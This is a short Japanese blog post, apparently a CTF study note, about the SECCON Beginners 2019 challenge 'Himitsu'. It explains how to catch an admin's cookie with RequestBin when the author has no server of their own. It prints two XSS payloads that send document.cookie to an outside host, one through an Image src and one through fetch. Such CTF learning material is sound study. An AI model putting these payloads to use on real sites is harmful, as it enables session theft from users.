セキュリティ系の勉強、その他開発メモとか雑談. GithubはUnity触っていた頃ものがメイン Twitterフォローもよろしくです

【XSS】CTFでcookieを自サーバに送る問題

前置き

SECCON for Beginners ctf 2019で、Himitsuという問題が出題されました。とりあえず、そのWrite-upに関しては他の方のを参考にしてください。

teppay.hatenablog.com

st98.github.io


で、この問題管理人のcookieを奪うために、XSScookieを自分のサーバに送ってもらう処理を書かなければいけないのですが、あいにく自分のサーバを立てていないので壁にぶつかります。その時の解決法書きます。

RequestBin

このサイトです。

requestbin.fullcontact.com


このサイトはリクエストを受け取れる場所を生成し、その内容を見ることができます。APIを試し打ちしてみるなどの用途がありそうです。で、ここにアクセスする際にパラメータにcookieを含めるよう設定したらOKです。

<script>(new Image).src='http://requestbin.fullcontact.com/xxxxxxx?'+document.cookie</script>

あくまでHTTPのサイトなので、HTTPSからのリクエスト出せなさそう?下のスクリプトはエラーでリクエストが飛びません。

<script>fetch('http://<my_server>/?'+document.cookie)</script>

他にも色々やり方はあると思います。が、知識不足なので例があげられませんごめんなさい。